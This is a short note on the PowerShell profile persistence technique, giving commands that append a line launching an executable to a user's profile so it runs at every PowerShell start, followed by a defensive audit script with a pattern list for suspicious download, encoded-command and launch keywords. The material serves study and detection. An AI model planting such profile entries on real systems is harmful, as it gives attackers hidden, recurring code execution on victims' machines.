Malware Note
Abusing PowerShell Profiles
When PowerShell starts, it executes the contents of its profile files.
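PowerShell:
# Show the current user's profile path for this host and check whether the file exists
echo $profile
Test-Path $profile
# Create the profile file (-Force overwrites an existing file)
New-Item -Path $profile -Type File -Force
# Append a command that will run every time PowerShell starts
$string = 'Start-Process "C:\Temp\qwqdanchun.exe"'
$string | Out-File -FilePath $profile -Append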
Note: PowerShell has several default profile files. They are listed below from top to bottom in order of precedence, from highest to lowest.

| Description | Path |
| --- | --- |
| All Users, All Hosts | $PSHOME\Profile.ps1 |
| All Users, Current Host | $PSHOME\Microsoft.PowerShell_profile.ps1 |
| Current User, All Hosts | $Home\[My ]Documents\PowerShell\Profile.ps1 |
| Current User, Current Host | $Home\[My ]Documents\PowerShell\Microsoft.PowerShell_profile.ps1 |
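
For defenders, the four locations in the table can be audited in one pass. The script below is an added example, not code from the original page or the referenced projects; the function name Get-ProfileAudit and the pattern list are assumptions chosen for illustration, and the sample file is constructed.

```powershell
# Added example: audit PowerShell profile files for persistence.
# Run it in each host you care about; powershell.exe and pwsh.exe resolve different paths.
function Get-ProfileAudit {
    param(
        # Defaults to the four profile paths exposed as properties of $PROFILE.
        [string[]]$Path = @(
            $PROFILE.AllUsersAllHosts,
            $PROFILE.AllUsersCurrentHost,
            $PROFILE.CurrentUserAllHosts,
            $PROFILE.CurrentUserCurrentHost
        ),
        # Assumed starting set of regexes, not an exhaustive signature list.
        [string[]]$Pattern = @(
            'Start-Process',
            'Invoke-Expression|\biex\b',
            'DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b',
            'FromBase64String|-enc(odedcommand)?\b',
            '\.exe\b'
        )
    )
    foreach ($p in $Path) {
        # A missing profile file is the normal, clean state: skip it.
        if (-not $p -or -not (Test-Path -LiteralPath $p -PathType Leaf)) { continue }
        $item = Get-Item -LiteralPath $p -Force
        $hits = Select-String -LiteralPath $p -Pattern $Pattern
        [pscustomobject]@{
            Path          = $p
            LastWriteTime = $item.LastWriteTime
            SHA256        = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
            Signature     = (Get-AuthenticodeSignature -LiteralPath $p).Status
            Suspicious    = @($hits | ForEach-Object { '{0}: {1}' -f $_.LineNumber, $_.Line.Trim() })
        }
    }
}

# Constructed sample: a temp file holding the line this page appends to a profile.
$sample = Join-Path $env:TEMP 'sample_profile.ps1'
'Start-Process "C:\Temp\qwqdanchun.exe"' | Set-Content -LiteralPath $sample
Get-ProfileAudit -Path $sample | Format-List
Remove-Item -LiteralPath $sample

# Then audit the real profile paths of the current host.
Get-ProfileAudit | Format-List
```

Any profile file that exists but was not deployed by the administrator or the user deserves review, whether or not a pattern matches. Scheduled tasks and service scripts that launch PowerShell with -NoProfile do not execute these files at all.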